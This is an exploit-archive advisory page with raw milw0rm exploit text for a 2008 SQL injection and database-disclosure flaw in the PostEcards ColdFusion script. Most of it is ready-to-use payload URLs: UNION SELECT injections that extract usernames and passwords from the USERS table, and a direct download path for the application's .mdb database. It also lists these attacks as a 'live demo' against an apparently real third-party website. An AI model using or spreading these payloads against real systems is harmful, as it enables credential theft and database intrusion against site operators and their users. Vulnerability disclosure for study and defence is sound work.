PostEcards SQL Injection and Database Disclosure Vulnerability

vendor:

PostEcards

by:

AlpHaNiX

8.8

CVSS

HIGH

SQL Injection and Database Disclosure

CWE

Product Name: PostEcards

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PostEcards SQL Injection and Database Disclosure Vulnerability

PostEcards is vulnerable to SQL Injection and Database Disclosure. An attacker can exploit this vulnerability by sending a maliciously crafted URL to the vulnerable application. This can allow the attacker to gain access to sensitive information such as usernames and passwords stored in the database. A live demo of this vulnerability can be found at http://www.melink.com/PostCards/database/postcards.mdb and http://www.melink.com/PostCards/sendcard.cfm?cid=0+union+SELECT%20null,null,username,null%20FROM%20USERS%00.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries. Additionally, access to sensitive files should be restricted.

Source

Exploit-DB raw data:

###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : PostEcards
#download : http://www.funscripts.net/old_coldfusion/download.php?fname=postcards

###########################################################################

#Exploits :

--=[SQL INJECTION]=--
http://www.target.com/sendcard.cfm?cid=0+union+SELECT%20null,null,username,null%20FROM%20USERS%00
http://www.target.com/sendcard.cfm?cid=0+union+SELECT%20null,null,pwd,null%20FROM%20USERS%00


--=[DATABASE DISCLOSURE]=--
http://www.target.com/database/postcards.mdb



#Live Demo
http://www.melink.com/PostCards/database/postcards.mdb
http://www.melink.com/PostCards/sendcard.cfm?cid=0+union+SELECT%20null,null,username,null%20FROM%20USERS%00

#Greetz For

###########################################################################

# milw0rm.com [2008-12-09]